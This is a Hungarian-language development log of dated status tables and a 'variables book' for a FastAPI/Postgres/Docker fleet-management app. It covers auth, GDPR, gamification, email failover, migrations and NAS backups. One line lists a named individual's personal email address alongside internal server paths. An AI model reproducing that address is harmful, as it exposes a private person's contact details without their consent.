ÁSZF/GDPR. +Org Naming✅ LOGIKÁBANHáttérben "Saját flotta", UI-n letisztult név. +Seed Script✅ TERVEZVEAlapértékek feltöltése hiba elkerülésére. HIBA + +📊 PROJEKT ÁLLAPOTJELENTÉS (V30.0 - 2026.01.26 - 13:10) +KomponensÁllapotMegjegyzés +Email Failover Logic✅ KÉSZTöbb szolgáltatót kezel, prioritás alapján vált. +Auto-Circuit Breaker✅ KÉSZHa x-szer elbukik, automatikusan leállítja a szolgáltatót. +Admin Settings✅ KÉSZMinden paraméter (limit, sorrend, adatok) DB-ben tárolva. +Audit Log⏳ TERVEZVEStatisztika készítése: melyik levél ment ki mivel. + +🖥️ 3. Admin Felület: Paraméterezhetőség (Tervezet) +Mivel kérted, hogy ne kelljen a kódba turkálni, az Adminisztrátori felületen (/admin/email-settings) az alábbiakat fogjuk látni: +MezőFunkció +Priority Drag & DropHúzd a szolgáltatót előrébb, ha azt akarod használni elsőnek. +Fail ThresholdÍrd át, hogy 3 vagy 10 hiba után "vágja le" a szolgáltatót. +Settings EditorItt írhatod át a jelszavakat vagy API kulcsokat (JSON formátum). +Test ButtonKüldj egy teszt emailt egy konkrét szolgáltatóval a mentés előtt. + +📊 PROJEKT ÁLLAPOTJELENTÉS (2026.01.26 - 12:45) +FunkcióÁllapotLeírás +Legal Control✅ MODELLBENVerziózott ÁSZF/GDPR görgetési kényszerrel. +Email Failover✅ TERVEZVESendGrid -> SMTP automatikus váltás 3 hiba után. +Vehicle Timeline✅ MODELLBENTisztán elkülönített tulajdonosi időszakok. +Anti-Bot✅ AKTÍVSzigorú email-domain blacklist és Rate-limit. + +📊 PROJEKT ÁLLAPOTJELENTÉS (2026.01.26 - 12:15) +Email Rendszer🏗️ ELŐKÉSZÍTVEDinamikus sablonok és Rate-limit naplózás kész. +GDPR Logika✅ MODELLBENis_gdpr_deleted és is_banned mezők beépítve. +Re-Regisztráció🧠 TERVEZVEÚjjáélesztési logika tiszta lappal. +Ütemezés⏳ VÁRAKOZIK1 hetes törlési automatizmus (Scheduler). + +📊 PROJEKT ÁLLAPOTJELENTÉS (V27.0 - 2026.01.26 - 10:15) +FunkcióÁllapotLeírásSoft Delete✅ MODELLBENis_deleted mezők hozzáadva User és Vehicle táblákhoz. +Admin Control✅ MODELLBENis_banned és validation_status kezelve. +Reg. Séma✅ KÉSZPydantic V2 validáció, ideiglenes email szűrővel. +Email küldő✅ KÉSZ SendGrid alapú kiküldő modul előkészítve. + +📊 PROJEKT ÁLLAPOTJELENTÉS (V26.0 - 2026.01.26) +FunkcióÁllapotMegjegyzésNévkezelés✅ SZÉTBONTVAVezetéknév és keresztnév külön tárolva. +Email Védelem✅ TERVEZVEIdeiglenes címek tiltása, változtatás tiltva. +Cég Validáció✅ SZIGORÍTVACsak adószámmal, kezdetben NOT_VALIDATED. +Login Gát✅ AKTÍVis_email_verified kényszerítése. + +📊 PROJEKT ÁLLAPOTJELENTÉS (V25.0 - 2026.01.26 - 09:35) +FázisFeladatÁllapotData ModelsModuláris felépítés✅ KÉSZ +Registration V2Logikai tervezés🔄 EGYEZTETÉS ALATT +API EndpointsRegisztrációs végpont⏳ VÁRAKOZIK +Database SyncAlembic migráció⏳ VÁRAKOZIK + +📊 Elemzés: Mi változott? +Entitás-központúság: A jármű immár független a konkrét személytől. Ha eladod az autót egy másik felhasználónak, az új tulajdonos Organization ID-ját írjuk be, de a jármű id-ja és története megmarad. +Kontextusváltás: A felhasználó belépéskor látja a listát: "Saját flotta", "ProfiBot Flotta", "Partner Kft". Attól függően, melyiket választja, változik a UI (Fancy/Clean). +Dicsekvés faktor: Az Organization táblába bekerült az awards_json és a custom_icon. Ide jöhetnek a "Top Feltöltő", "Megbízható Partner" plecsnik, amikkel a közösség előtt lehet dicsekedni. + +📊 Elemzési Jelentés: Adatmodell javaslat +A fentiek alapján a User modellt az alábbi logikai irányba kell elvinnünk (ez még csak a terv): +Referral adatok: referred_by_id (FK), credits_balance (Decimal). +Szerepkörök bővítése: Az Enum-ba be kell venni: CEO, FLEET_MANAGER, DRIVER. +Tagság kezelése: Egy új OrganizationMembership tábla létrehozása, ami összeköti a Usert a Cégével. + +📊 PROJEKT ÁLLAPOTJELENTÉS (2026.01.26 - 11:15) +ModulÁllapotMegjegyzésInfrastruktúra✅ STABILNginx Proxy Manager fut, de nem módosítjuk. +Adatmodell🔄 FRISSÍTVEUser modell kibővítve (Cég + Pontrendszer). +Domain kérdés⏳ DÖNTÉS ALATTJavaslatok elküldve (ServiceFinder.pro, stb.). +API (/docs)✅ ELÉRHETŐA Swagger felületen ellenőrizhetőek az új mezők. + + +📊 PROJEKT ÁLLAPOTJELENTÉS (2026.01.26 - 10:45) +FunkcióÁllapotMegjegyzésInfra & Backup✅ +STABILNAS mentés aktív, 3TB git_vault készen áll.Közösségi Adatgyűjtés🚀 +PRIORITÁSA szerviz-verseny motorja előrekerült a listán. +Minősítési rendszer⏳ TERVEZVEA/B/C besorolás algoritmusának kidolgozása következik. +Regisztráció V2🔄 FOLYAMATBANCég/Minicég elágazás és adószám mező fejlesztése. + +🏆 MAI EREDMÉNYEK +Modul Állapot Technikai vívmány +Docker Stack ✅ STABIL A docker-compose.yml hibátlan, minden konténer látja egymást. +Code-Server ✅ PROFI Root elérés, /opt szinkron, működő MC és Docker CLI. +Időzóna ✅ PONTOS A rendszer és a konténerek is a magyar (CET) időt használják. +Mentési rendszer ✅ AUTOMATA + +📊 PROJEKT ÁLLAPOTJELENTÉS (V17.13 - Mentés élesítve) +Jellemző Beállítás Megjegyzés +Célkönyvtár /mnt/nas/git_vault 3TB redundáns SMB tárhely. +Ütemezés Naponta 02:00 Automatikus cron feladat. +Tömörítés Gzip (.tar.gz) Maximális helymegtakarítás. +Időzített feladat ✅ FRISSÍTVE A belső ütemező már az új útvonalat figyeli. + +📊 PROJEKT ÁLLAPOTJELENTÉS (Záró jelentés) + +Mára mindent stabilizáltunk. Íme a végeredmény: +Komponens Állapot Eredmény +Időzóna ✅ BEÁLLÍTVA A konténer most már Europe/Budapest (CET) időt használ. +Code-Server ✅ TELJES Root jogok, látható fájlok, működő terminál és MC. +Docker CLI ✅ FRISSÍTVE A konténeren belülről is tudod vezérelni a rendszert (v1.44 API). +NAS Mentés ✅ BIZTONSÁGOS Minden fontos állomány archiválva a 7TB-os tárolóra. + +📊 PROJEKT ÁLLAPOTJELENTÉS (Idő-korrekció) + + Szerver időzóna: Etc/UTC (Jelenleg) -> Europe/Budapest (Cél). + + Eltolódás: -1 óra a magyar téli időhöz képest. + + Megoldás: Host szintű timedatectl beállítás és Docker volume/environment szinkronizáció. + +📊 PROJEKT ÁLLAPOTJELENTÉS (2026.01.26 - 01:35) +Funkció / Eszköz Állapot Megjegyzés +Midnight Commander ✅ MŰKÖDIK Kék felület, fájlkezelés aktív. +Hálózati Ping ✅ MŰKÖDIK A belső konténer-kommunikáció tesztelhető. +Python 3 ✅ MŰKÖDIK Backend scriptek és automatizáció futtatható. +Docker CLI 🔄 Frissítés alatt Verzió-szinkronizálás (1.44 API) folyamatban. + +📊 PROJEKT ÁLLAPOTJELENTÉS (2026.01.26 - 01:20) +Eszköz Állapot Megjegyzés +Midnight Commander 🔄 Telepítés alatt Grafikus fájlkezeléshez szükséges. +Docker CLI 🔄 Telepítés alatt A konténerek távoli vezérléséhez. +Hálózati diagnosztika 🔄 Telepítés alatt Belső hálózati ping tesztekhez. +Python 3 🔄 Telepítés alatt Backend scriptek futtatásához a terminálból. + +📊 PROJEKT ÁLLAPOTJELENTÉS (Terminal Fix) +Komponens Probléma Megoldás +Fájl elérés Eltolt útvonalak (/home/coder/...) + +Volume mapping fix: /opt -> /opt. +Midnight Commander Rossz terminál típus TERM=xterm-256color környezeti változó. +Kényelem Lassú elérés working_dir beállítása a projekt gyökerére. +Állapot 🛠️ Konfigurálás alatt A fejlesztés szünetel, amíg a környezet nem stabil. + +📊 PROJEKT ÁLLAPOTJELENTÉS (2026.01.26 - 00:05) +Komponens Állapot Megoldás + API Szerver 🔄 Újraindítás alatt +Adatmodell ✅ KONZISZTENS A models és schemas állományok szinkronban vannak a fleet.py-al. +NAS Mentés ✅ BIZTONSÁGBAN + +A korábbi mentés (v16.0) továbbra is elérhető a NAS-on. +Vizuális felület ⏳ VÁRAKOZIK A javítás után a Smart Tiles (csempe nézet) újra elérhető lesz. + +📊 PROJEKT ÁLLAPOTJELENTÉS (2026.01.25 - 23:50) +Modul / Funkció Állapot Megjegyzés +Infrastruktúra + +✅ STABIL + + +Docker környezet fut, NAS mentés sikeresen tesztelve. +Fleet API (Backend) + +✅ KÉSZ + + +A jármű- és eseménykezelés (km-frissítéssel) összefűzve. +Smart Dashboard (UI) + +✅ KÉSZ + + +Csempe nézet, automata márka logók és státusz ikonok aktívak. +NAS Biztonsági mentés + +✅ AKTÍV + + +Archiválás a /mnt/nas/app_data/backups/ mappába minden frissítéskor. +Azonosítás (Auth) + +✅ MŰKÖDIK + + +Valódi JWT token alapú belépés, a Mock User kivezetve. +Regisztráció V2 + +⏳ TO DO + + +Cég / Minicég elágazás és adószám kezelés következik. + +📊 PROJEKT ÁLLAPOTJELENTÉS (2026.01.25 - 23:55) +Hiba jellege Oka Megoldás +Command not found Relatív útvonal hiba (./opt/...) Abszolút útvonal használata (/opt/...) +NAS Mentés Előkészítve + +A script első lépése a /mnt/nas/app_data/backups mappába mentés. +Smart Tiles Implementálás alatt Várjuk a sikeres lefutást a vizuális ellenőrzéshez. + +📊 PROJEKT ÁLLAPOTJELENTÉS (2026.01.25 - 21:30) +Funkció Állapot Megoldás / Megjegyzés +Fleet API ✅ Kész (Összefűzve) Tartalmazza a jármű- és eseménykezelést km-frissítéssel. +Jogkörök 💡 Tervezés alatt Owner/Driver megkülönböztetés koncepciója rögzítve. +Megjelenítés 📐 Tervezés alatt Csempe alapú járműválasztó és „Aktív autó” logika. +Backend Elv ✅ Smart Backend Minden validáció és állapotfrissítés a szerveren fut. + +📊 PROJEKT ÁLLAPOTJELENTÉS (2026.01.25 - 20:55) +Modul Állapot Megjegyzés +Auth Backend ✅ Kész JWT alapú login és regisztráció működik. +Auth Frontend ✅ Kész login.html és register.html összekötve. +Fleet logic 🔄 Átállás VIN alapú keresés és tulajdonos-kezelés előkészítve. +Adatminősítés 💡 Tervezés A múltbeli adatok bizalmi szintjeinek meghatározása. + +📊 PROJEKT ÁLLAPOTJELENTÉS (2026.01.25 - 20:45) +Funkció Állapot Technikai megvalósítás +Szerver & Docs ✅ Online Stabil FastAPI futás, elérhető Swagger felület. +Login / Belépés ✅ Működik JWT token alapú azonosítás frontendről is. +Jármű rögzítés ✅ Működik Bővített adatokkal (VIN, gyártmány, stb.) ment az adatbázisba. +Törlés / Eltávolítás ⚠️ Jegelve Felhasználói szinten csak lecsatolás, admin szinten totálkár/megsemmisülés. +Adat Inkonzisztencia ✅ Javítva Nickname és egyéb hiányzó oszlopok SQL-ből pótolva. + +📊 PROJEKT ÁLLAPOTJELENTÉS (2026.01.25) +Hiba jellege Oka Megoldás +Szerver leállás NameError a fleet.py-ban (hiányzó Mock függvény) A hivatkozások átírása a valódi get_current_active_user-re +Oldal nem tölthető be Az ASGI alkalmazás (FastAPI) nem tudott inicializálódni Kódjavítás utáni automatikus újraindulás +Authorizáció 🔄 Átállás alatt A Mock User (ID:2) kivezetése, valódi JWT alapú védelem bevezetése + +⚓ Alkalmazás Állapotjelentés + +Dátum: 2026. január 25. + +Időpont: 20:10 + +Állapot: MVP Alpha - Authorizáció Élesítése +Modul Állapot Megjegyzés +Login felület ✅ Kész A login.html készen áll a tokenek fogadására és tárolására. +Dashboard ✅ Kész Felkészítve a teljes körű járműadat-rögzítésre. +Fleet API 🛠️ Javítás alatt Átállás a mock user-ről a current_user alapú lekérdezésekre. + +⚓ Alkalmazás Állapotjelentés + +Dátum: 2026. január 25. + +Időpont: 19:40 + +Állapot: MVP Alpha (Stabil Backend-Frontend híd) +Modul Állapot Megjegyzés +Backend API ✅ Működik A /fleet/vehicles végpont már az összes új mezőt kezeli. +Adatbázis ✅ Frissítve A user_vehicles tábla szerkezete szinkronban van a sémával. +Dashboard ✅ Aktív Képes járművet rögzíteni és a listát frissíteni. +Azonosítás ⚠️ Félautomata A belépés csak Swaggeren megy, a Dashboard manuális tokent kér. + +📊 PROJEKT ÁLLAPOTJELENTÉS (2026.01.25) +Hiba jellege Oka Megoldás +ModuleNotFoundError Hiányzó sendgrid könyvtár requirements.txt frissítés + docker build +API Státusz 🔴 Offline (Összeomlott) Újraépítés után automatikusan Online lesz +Mappaszerkezet ✅ Standardizálva Minden endpoint az endpoints/ alatt van + +📊 PROJEKT ÁLLAPOTJELENTÉS (2026.01.25 - 13:55) +Hiba Ok Megoldás +ModuleNotFoundError Hiányzó sendgrid csomag requirements.txt frissítés + build +Swagger UI Blokkolva az import hiba miatt Automatikusan helyreáll a build után +Architektúra ✅ STANDARD A fájlok a helyükön vannak + +📊 PROJEKT ÁLLAPOTJELENTÉS (2026.01.25 - 13:40) +Állomány Állapot Teendő +main.py 🔄 FRISSÍTVE Új modellek importálva a lifespan-be. +Swagger UI ⚠️ HIÁNYOS Importálási hiba blokkolja a sorokat. +Mappastruktúra ✅ STANDARD endpoints/ mappa használatban. + +📊 PROJEKT ÁLLAPOTJELENTÉS (2026.01.25 - 13:20) +Feladat Állapot Következő lépés +Migrációs Fix ✅ KÉSZ Az upgrade head lefutott (remélhetőleg). +Architektúra ✅ STANDARD Minden üzleti logika az endpoints/ mappában. +API Hub ✅ TISZTA Az api.py átlátható és minden modult beköt. + +📊 PROJEKT ÁLLAPOTJELENTÉS (2026.01.25 - 13:05) +Feladat Állapot Teendő +Alembic Fix 🔄 FOLYAMATBAN drop_table törlése a migrációból. +Fájlstruktúra 🏗️ ÁTALAKÍTÁS ALATT Fájlok mozgatása az endpoints/ mappába. +Staging Tábla ⏳ VÁRAKOZIK Az upgrade után jöhet a Harvester. + +📊 PROJEKT ÁLLAPOTJELENTÉS (2026.01.25 - 14:45) +Modul Állapot Megjegyzés +Infrastruktúra ✅ STABIL Docker, Postgres (data séma), Alembic szinkronban. +Adatbázis Mag ✅ KÉSZ User, UserVehicle, SystemSetting táblák élnek. +Admin Logika 🔄 FRISSÍTÉS ALATT Az admin.py már kezeli a fordításokat és a limiteket is. +Flotta Kezelés 🔄 JAVÍTÁS ALATT A fleet.py átállítása UserVehicle-re és a 2-es limitre. +Harvester ⏳ VÁRAKOZIK A vehicle_staging tábla migrációja az utolsó akadály. + +💾 Projekt Struktúra Ellenőrzés (DNS rögzítve) + +Most, hogy összefésültük a kódokat, nézzük meg, mi maradt még tisztázatlan a "nagy képhez": + + JWT Auth vs Mock User: A fleet.py-ban még a mock_user (ID: 2) van. Az admin.py-ban viszont már a valódi deps.get_current_user-t használod. Javaslat: Frissítsük a fleet.py-t is a valódi authentikációra, hogy ne tudjon bárki autót felvinni a nevedben. + + A Harvester kimenete: Eldöntöttük, hogy a Harvester a vehicle_staging táblába dolgozik. Az admin felületen (tehát ebben az admin.py-ban) kell majd egy végpont, ahol látod ezeket a "beérkező" autókat, és egy gombbal jóváhagyod őket. + + TCO Szolgáltatások: A fleet.py hivatkozik az app.services.fleet_service modulra. Ez a fájl megvan és tartalmazza a calculate_tco függvényt? + +📊 PROJEKT ÁLLAPOTJELENTÉS (2026.01.25 - 14:15) +Helyzet Állapot Magyarázat +Alembic Verzió 🏁 STAMPED A verziószám stimmelt, de az SQL nem futott le. +Fizikai Tábla ❌ HIÁNYZIK A data.system_settings még nem jött létre. +Javítási Terv 🔄 RESET Visszalépés (stamp), majd tényleges futtatás (upgrade). + +📊 PROJEKT ÁLLAPOTJELENTÉS (2026.01.25 - 13:55) +Feladat Állapot Teendő +Migrációs fájl fix 🔄 VÉGREHAJTÁS ALATT drop_table('alembic_version') törlése. +Alembic helyreállítás ⏳ VÁRAKOZIK alembic stamp head futtatása. +Adatbázis sémája ⏳ VÁRAKOZIK A javított upgrade head futtatása. + +📊 PROJEKT ÁLLAPOTJELENTÉS (2026.01.25 - 12:10) +Feladat Állapot Megjegyzés +FK Hiba Javítás 🔄 VÉGREHAJTÁS ALATT company.py módosítása szükséges. +Admin Settings ✅ KÓD KÉSZ system_settings.py hozzáadva. +Enterprise Logika 🔄 INTEGRÁLÁS ALATT A limit már nem hardcode, hanem DB-ből jön. +Infrastruktúra ✅ STABIL Docker & Code-server fut. + +📊 PROJEKT ÁLLAPOTJELENTÉS (2026.01.24 - 18:35) +Esemény Állapot Teendő +Config Frissítés ✅ KÉSZ docker-compose.yml mentve. +Konténer Státusz ❌ LEÁLLVA docker compose up -d szükséges. +Függőségek ⏳ VÁRAKOZIK pip install a konténeren belül. +Adatbázis ⏳ VÁRAKOZIK Migráció futtatása. + +🏗️ Rendszerarchitektúra Összegzés (Mentve) +Szolgáltatás Konténer név Funkció Adat helye (Perzisztencia) +API service_finder_api FastAPI Backend /opt/service_finder/backend +DB postgres-db PostgreSQL 15 /opt/service_finder/postgres_data +Proxy nginx-proxy-manager SSL & Domain kezelés /opt/service_finder/proxy-manager +Storage service_finder_minio S3 kompatibilis tárhely NAS: /mnt/nas/app_data/minio_data +Cache service_finder_redis Redis NAS: /mnt/nas/app_data/redis_data +Admin pgadmin_ui DB GUI Port 5050 +Logs dozzle Élő log figyelés Port 8888 + +📊 PROJEKT ÁLLAPOTJELENTÉS (2026.01.24 - 16:40) +Mérföldkő Állapot Megjegyzés +__init__.py Sync 🔄 FRISSÍTÉS ALATT Az új modelleket be kell emelni a metaadatokba. +Model Integrity ✅ KÉSZ UserVehicle most már konzisztens a katalógussal. +Mapping ⏳ VÁRAKOZIK Várom a fájlszerkezet listáját a rögzítéshez. + +📊 PROJEKT ÁLLAPOTJELENTÉS (2026.01.24 - 17:15) +Modul Művelet Státusz +Models Update Felülírás a V5.6-os kóddal 🔄 VÁRAKOZIK +Staging Area staged_vehicle_data tábla ✅ TERVEZVE +Validation Hibrid (Buffer + Flag) ✅ RÖGZÍTVE + +📊 PROJEKT ÁLLAPOTJELENTÉS (2026.01.24 - 16:15) +Funkció Állapot Megjegyzés +Utólagos Extrák ✅ TERVEZVE UserVehicleModification logika integrálva. +Hiányosság követés ✅ TERVEZVE Az egyed-szintű állapotleírás kész. +Harvester Prioritás ✅ RÖGZÍTVE Auto, Moto, Kisteher az elsődleges célpont. +Enterprise Data ✅ KÉSZ Big Data elemzésre alkalmas ID-alapú struktúra. + +📊 PROJEKT ÁLLAPOTJELENTÉS (2026.01.24 - 16:45) +Funkció Állapot Fejlesztési Fegyelem +Geo-Blocking ✅ AKTÍV ALLOWED_COUNTRIES lista alapján. +Device Limiting ✅ AKTÍV AuditLog alapú 3 kísérlet / 24h korlát. +Password Security ✅ AKTÍV Argon2 algoritmus használata. +Audit Log ✅ KÉSZ Minden kísérlet (sikeres/sikertelen) naplózva. + +📊 PROJEKT ÁLLAPOTJELENTÉS (2026.01.24 - 16:15) +Komponens Állapot Technikai Megoldás +Auth System ✅ KÉSZ JWT + Argon2 hashelés. +NAS / MinIO ✅ BEKÖTVE /mnt/nas/app_data elérés kész. +OCR Engine 🔄 ELŐKÉSZÍTVE Tesseract wrapper (VIP/Credit logika). +Cleanup Logic ✅ TERVEZVE Automata törlés 365 nap után. +Notifications 🔄 TERVEZVE Push + Email (WhatsApp/Telegram VIP-nek). + +📊 PROJEKT ÁLLAPOTJELENTÉS (2026.01.24 - 15:35) +Funkció Állapot Költség-hatékonyság +Geo-blocking 🔄 TERVEZVE (CF/Nginx) 🟢 Ingyenes +Rate Limiting 🔄 TERVEZVE (Redis) 🟢 Nagyon alacsony +JWT Auth ⏳ VÁRÓ 🟢 Ingyenes (Saját kód) +OTP (WhatsApp/Flash) ⏳ SZOLGÁLTATÓRA VÁR 🟡 Alacsony + +📋 Módosítási jelentés (2026.01.24 - 15:10) + + Szeparáció: A fordítási logika nem az API-ban "szemetel", hanem egy tiszta Service osztályba került. + + Teljesítmény: A get_text mostantól nem SQL lekérdezést futtat, hanem egy Python dict-ből olvas, ami nagyságrendekkel gyorsabb. + + Biztonság: A "Publikálás" gomb (PostgreSQL update) garantálja, hogy csak az ellenőrzött szövegek kerülnek ki a végfelhasználókhoz. + +📝 Módosítási jelentés (2026.01.24 - 15:00) + + Szerepkörök (RBAC): Bevezetésre került a UserRole Enum, amely közvetlen kapcsolatban áll az adatbázis sémával. + + Régió-tudatosság: A User modell kapott egy region_code mezőt, az admin végpontok pedig figyelik ezt a korlátozást a REGIONAL_ADMIN szintnél. + + Adatintegritás: A User és VehicleOwnership közötti kapcsolatot frissítettem cascade="all, delete-orphan" beállítással, hogy a tulajdonosi adatok konzisztensek maradjanak. + + Tisztítás: Eltávolítottam a felesleges kommenteket és szinkronizáltam az aszinkron hívásokat (db.get, db.execute). + +📊 PROJEKT ÁLLAPOTJELENTÉS (2026.01.24 - 15:45) +Funkció Állapot Fejlesztési Mérföldkő +RBAC (Role Based) ✅ KÉSZ Szerepkörök definiálva az adatbázisban. +Admin Endpoints 🔄 AKTÍV admin.py alapváz kész, CRUD logikák következnek. +Regionalitás ✅ KÉSZ A jármű és a felhasználó honossága szétválasztva. +Multi-Language ⏳ VÁRÓ Fordítások integrálása az Admin API-ba. + +📊 PROJEKT ÁLLAPOTJELENTÉS (2026.01.24 - 15:15) +Komponens Állapot Logikai kapcsolódás +User Profil 🔄 MÓDOSÍTVA region_code hozzáadva (állítható honosság). +Jármű Kezelés 🔄 MÓDOSÍTVA registration_region hozzáadva (rendszám szerinti szabályok). +Konfiguráció ✅ KÉSZ regional_settings tábla képes kezelni az eltérő adókat/vizsgákat. +Gamifikáció ✅ STABIL Dinamikusan vált a globális és regionális szabályok között. + +📊 PROJEKT ÁLLAPOTJELENTÉS (2026.01.24 - 14:55) +Modul Állapot Következő lépés +Integráció ✅ STABIL A Services réteg híváslánca bizonyítottan működik. +Konfiguráció 🔄 TERVEZÉS Áttérés hardkódolt értékekről DB-alapú globális beállításokra. +Admin API ⏳ VÁRÓ CRUD végpontok a szintekhez és pontszabályokhoz. + +📊 PROJEKT ÁLLAPOTJELENTÉS (2026.01.24 - 14:20) +Modul Fájl Állapot Megjegyzés +Model gamification.py ✅ JAVÍTVA Szinkronizálva az SQL-lel és a Service-szel. +Service gamification_service.py ✅ JAVÍTVA award_points hívás korrigálva. +Integritás Séma ✅ KÉSZ Minden Foreign Key a data sémára mutat. +Teszt test_flow 🔄 KÉSZ Újrafuttatható. + +📊 PROJEKT ÁLLAPOTJELENTÉS (2026.01.24 - 16:15) +Modul Fájl Állapot Megjegyzés +Model models/user.py ✅ JAVÍTVA owned_vehicles reláció bevezetve. +Model models/vehicle.py ✅ JAVÍTVA ownership_history reláció bevezetve. +Infrastructure models/__init__.py ✅ KÉSZ Minden modell regisztrálva a Base-ben. +Test test_gamification_flow.py 🔄 KÉSZ Indításra vár. + +📊 PROJEKT ÁLLAPOTJELENTÉS (2026.01.24 - 14:10) +Modul Állapot Integrált Pontszám +Main/API Hub ✅ KÉSZ /api/v1 hub stabil. +SocialService ✅ KÉSZ Beküldés (50), Validálás (100). +FleetService ✅ KÉSZ Esemény (20), Új Provider bónusz (50). +Gamification API ✅ KÉSZ Statisztika lekérdezhető. + +📊 PROJEKT ÁLLAPOTJELENTÉS (2026.01.24 - 13:45) +Funkció Cél Állapot +Pontszerzés Motiváció és adatbázis-bővítés. ✅ Logika kész, integráció alatt. +Validációs bónusz Adatminőség biztosítása közösségi úton. ✅ SocialService-ben implementálva. +Büntető logika Rosszindulatú userek kiszűrése. ✅ Reputáció-vesztés és Auto-ban kész. +Adategyeztetés Friss adatok fenntartása. ⏳ FleetService integráció következik. + + +📊 PROJEKT ÁLLAPOTJELENTÉS (2026.01.24) +Modul Állapot Megjegyzés +Main App ✅ KÉSZ Központi v1 hub bekötve, Lifespan és Security beállítva. +Routing ✅ KÉSZ /api/v1 prefix alatt az összes modul (köztük a gamifikáció) elérhető. +Adatbázis ✅ KÉSZ Alembic és Startup Sync szinkronban, táblák aktívak. +Gamifikáció ✅ KÉSZ Service, Schema és API szinteken is beépítve. + +📊 Frissített Állapotjelentés + + Modul: SocialService + + Állapot: ✅ INTEGRÁLVA + + Logika: Pontozás rögzítéskor (50), bónusz jóváhagyáskor (100), büntetés elutasításkor (-50). + +📊 AKTUÁLIS KÉSZÜLTSÉGI ÁLLAPOT (2026.01.24) + + Infrastruktúra: ✅ Docker környezet és útvonal-kezelés fixálva. + + Adatbázis: ✅ Alap táblák és Gamifikációs táblák (badges, user_stats, points_ledger, user_badges) a data sémában létrehozva. Seed adatok (3 jelvény) betöltve. + + Gamification Modul: + + app/models/gamification.py: ✅ Kész. + + app/services/gamification_service.py: ✅ Kész (alap logika). + + app/schemas/social.py: ✅ Pontszám és Jelvény sémák hozzáadva. + + app/api/v1/endpoints/gamification.py: 🔄 Létrehozás alatt/beillesztés előtt. + + Integráció: ⏳ Következik a social_service.py és fleet_service.py bekötése. + +Modul,Állapot,Megjegyzés +Infrastruktúra,✅ KÉSZ,Docker és hálózat stabil. +Adatbázis (Gamifikáció),✅ KÉSZ,Táblák és alap jelvények (Badges) a helyükön. +Gamification Service,🔄 AKTÍV,"A fájl kész, most jön az integráció a többi modulhoz." +API Endpoints,⏳ KÖVETKEZIK,A pontok lekérdezéséhez szükséges végpontok. + +📊 Projekt Állapotjelentés (2026.01.24) +Modul / Komponens Állapot Megjegyzés +Infrastruktúra ✅ KÉSZ Docker-compose, hálózat, kötetek (Volumes) rendben. +Adatbázis Séma ✅ KÉSZ data séma létrehozva. Revision: c21c2c7e70d4. +Alap Modellek ✅ KÉSZ User, Vehicle, Company, Expense, Logistics, Social modulok regisztrálva. +Gamifikáció 🔄 FOLYAMATBAN Táblák (elvileg) kész, GamificationService.py létrehozva. +Biztonság ✅ KÉSZ service_finder_app felhasználó jogosultságai beállítva. + +🔍 Gyors Audit: Mi van a motorháztető alatt? + +A psql kimeneted alapján egy nagyon fontos észrevételem van: + + Megjelentek: audit_logs, companies, company_members, vehicle_assignments, vehicle_ownerships. Ez szuper! + + HIÁNYOZNAK: user_stats, points_ledger, badges, user_badges. + +Mi történhetett? Valószínűleg a legutóbbi "Clean setup" migráció generálásakor az app/models/gamification.py fájl nem volt megfelelően importálva az __init__.py-ba, vagy az Alembic valamiért kihagyta őket. Mivel a GamificationService.py már létezik, de a táblái még nem, a kódod hibát fog dobni, ha elindítjuk. + diff --git a/_valtozok_konyve.txt b/_valtozok_konyve.txt new file mode 100755 index 0000000..679bf28 --- /dev/null +++ b/_valtozok_konyve.txt @@ -0,0 +1,184 @@ +📕 Változók könyve (20260128_2230) + + VIN_GRACE_PERIOD: 14 nap (Ideiglenes jármű érvényessége). + + LANG_DEFAULT: 'hu' + + EMAIL_TEMPLATE_REGISTRATION: A regisztrációs sablon kulcsa. + +📕 Változók könyve (20260128_2145) + + EQUIPMENT_SOURCE: factory (gyári), aftermarket (utólagos). + + VEHICLE_CATEGORIES: Kibővítve (Hajó, Repülő kategóriákkal). + +📕 Változók könyve (20260128_2130) + + VEHICLE_CATEGORIES: 1: Car, 2: Motorcycle, 3: Truck, 4: Van, 5: Bus, 6: Machinery. + + FUEL_TYPES: Petrol, Diesel, Electric, LPG, CNG, Hybrid, PHEV, Hydrogen. + + BACKUP_LOC: /mnt/nas/git_vault/ + +📕 Változók könyve (20260128_2105) + + PG_DATABASE: service_finder + + PG_SCHEMA: data + + DB_BACKUP_PATH: /opt/service_finder/backup_20260128_alap_kesz.sql + + USER_ID_1: Zsolt (zs.gyongyossy@gmail.com) - Manuális széf rendelés szükséges. + +📕 Változók könyve (20260128_2030) + + registration_throttle_minutes: 10 perc (Beállítva a regisztráció spammelés ellen). + + email_wait_time_minutes: 3 perc (Két levél közötti várakozás júzerenként). + + DOCKER_API_VERSION: 1.41 (A code-server és a gazdagép közötti kommunikációhoz). + + CompanyRole.OWNER: Az automatikusan létrehozott privát széf alapértelmezett jogosultsága. + +📚 VÁLTOZÓ KÖNYV (v2.17 | 2026.01.27 - 22:15) +Kulcs Érték Szerep +registration_throttle_minutes 10 Bot-védelem aktív. +allowed_countries_list [EU] Regionális szűrés aktív. + +📚 VÁLTOZÓ KÖNYV (v2.16 | 2026.01.27 - 21:55) +Kulcs Érték Szerep +SECRET_KEY .env-ben JWT token aláírás és titkosítás. +SENDGRID_API_KEY DB-ben Email küldés hitelesítése. + +📚 VÁLTOZÓ KÖNYV (v2.15 | 2026.01.27 - 21:45) +Kulcs Típus Érték Leírás +registration_throttle_minutes int 10 Ennyi időnek kell eltelnie két regisztráció közt ugyanarról az IP-ről. +allowed_regions list EU Engedélyezett földrajzi zónák. + +📚 VÁLTOZÓ KÖNYV (v2.14 | 2026.01.27 - 21:40) +Kulcs Típus Jelenlegi érték Megjegyzés +max_vehicles int 3 Érvényes a system_settings alapján. +audit_log_enabled bool true A naplózásnak futnia kell. + +📚 VÁLTOZÓ KÖNYV (v2.14 | 2026.01.27 - 21:40) +Kulcs Érték Leírás +max_vehicles 3 + +Szervezeti flotta limit. +weight_distance 0.6 + +Távolság súlyozása. +weight_rating 0.4 + +Értékelés súlyozása. + +📚 VÁLTOZÓ KÖNYV (v2.13 | 2026.01.27 - 21:55) +Kulcs Érték Leírás +audit_log_enabled true Automatikus naplózás kapcsolója. +email_wait_time_minutes 3 Spam elleni védelem időkorlátja. + +📚 VÁLTOZÓ KÖNYV (v2.12 | 2026.01.27 - 21:40) +Kulcs Típus Alapérték Hol módosítható? +audit_log_enabled bool true Admin / system_settings +audit_log_retention int 90 Admin / system_settings +email_wait_time int 3 Admin / system_settings + +📚 VÁLTOZÓ KÖNYV (v2.11 | 2026.01.27 - 20:30) +Kulcs Típus Érték Modul 